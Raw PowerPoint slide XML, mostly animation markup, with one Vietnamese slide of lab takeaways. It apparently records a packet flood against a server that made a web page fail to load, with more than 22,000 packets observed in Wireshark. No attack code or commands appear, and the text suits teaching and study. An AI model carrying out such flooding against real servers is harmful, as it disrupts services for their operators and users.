        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2653317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6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="115" dur="580">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="11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6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="60000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="122" dur="166" decel="50000">
                                          <p:stCondLst>
                                            <p:cond delay="676"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="100000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="123" dur="26">
                                          <p:stCondLst>
                                            <p:cond delay="1312"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="80000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="124" dur="166" decel="50000">
                                          <p:stCondLst>
                                            <p:cond delay="1338"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="100000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="125" dur="26">
                                          <p:stCondLst>
                                            <p:cond delay="1642"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="90000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="126" dur="166" decel="50000">
                                          <p:stCondLst>
                                            <p:cond delay="1668"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="100000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="127" dur="26">
                                          <p:stCondLst>
                                            <p:cond delay="1808"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="95000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="128" dur="166" decel="50000">
                                          <p:stCondLst>
                                            <p:cond delay="1834"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">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animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="133" dur="580">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13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7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="60000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="140" dur="166" decel="50000">
                                          <p:stCondLst>
                                            <p:cond delay="676"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="100000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="141" dur="26">
                                          <p:stCondLst>
                                            <p:cond delay="1312"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="80000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="142" dur="166" decel="50000">
                                          <p:stCondLst>
                                            <p:cond delay="1338"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="100000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="143" dur="26">
                                          <p:stCondLst>
                                            <p:cond delay="1642"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="90000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="144" dur="166" decel="50000">
                                          <p:stCondLst>
                                            <p:cond delay="1668"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="100000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="145" dur="26">
                                          <p:stCondLst>
                                            <p:cond delay="1808"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="95000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="146" dur="166" decel="50000">
                                          <p:stCondLst>
                                            <p:cond delay="1834"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">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8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="151" dur="580">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15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8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="60000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="158" dur="166" decel="50000">
                                          <p:stCondLst>
                                            <p:cond delay="676"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="100000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="159" dur="26">
                                          <p:stCondLst>
                                            <p:cond delay="1312"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="80000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="160" dur="166" decel="50000">
                                          <p:stCondLst>
                                            <p:cond delay="1338"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="100000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="161" dur="26">
                                          <p:stCondLst>
                                            <p:cond delay="1642"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="90000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="162" dur="166" decel="50000">
                                          <p:stCondLst>
                                            <p:cond delay="1668"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="100000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="163" dur="26">
                                          <p:stCondLst>
                                            <p:cond delay="1808"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="95000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="164" dur="166" decel="50000">
                                          <p:stCondLst>
                                            <p:cond delay="1834"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>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3">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="169" dur="580">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17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3">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="60000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="176" dur="166" decel="50000">
                                          <p:stCondLst>
                                            <p:cond delay="676"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="100000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="177" dur="26">
                                          <p:stCondLst>
                                            <p:cond delay="1312"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="80000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="178" dur="166" decel="50000">
                                          <p:stCondLst>
                                            <p:cond delay="1338"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="100000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="179" dur="26">
                                          <p:stCondLst>
                                            <p:cond delay="1642"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="90000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="180" dur="166" decel="50000">
                                          <p:stCondLst>
                                            <p:cond delay="1668"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="100000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="181" dur="26">
                                          <p:stCondLst>
                                            <p:cond delay="1808"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="95000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="182" dur="166" decel="50000">
                                          <p:stCondLst>
                                            <p:cond delay="1834"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>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3">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="187" dur="580">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18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3">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="60000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="194" dur="166" decel="50000">
                                          <p:stCondLst>
                                            <p:cond delay="676"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="100000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="195" dur="26">
                                          <p:stCondLst>
                                            <p:cond delay="1312"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="80000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="196" dur="166" decel="50000">
                                          <p:stCondLst>
                                            <p:cond delay="1338"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="100000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="197" dur="26">
                                          <p:stCondLst>
                                            <p:cond delay="1642"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="90000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="198" dur="166" decel="50000">
                                          <p:stCondLst>
                                            <p:cond delay="1668"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="100000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="199" dur="26">
                                          <p:stCondLst>
                                            <p:cond delay="1808"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:to x="100000" y="95000"/>
                                    </p:animScale>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="200"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FE77A-E83A-4361-B13F-E9DD646907C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="375684"/>
            <a:ext cx="10515600" cy="5801279"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hoạch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ngay</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gói</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>liên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gửi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chủ</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khiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tắc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghẽn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tôi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>truy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> qua browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thì</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tức</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tải</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Khi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>theo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dõi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gói</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tôi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thấy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hơn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 22000 </a:t>
            </a:r>
            <a:r>
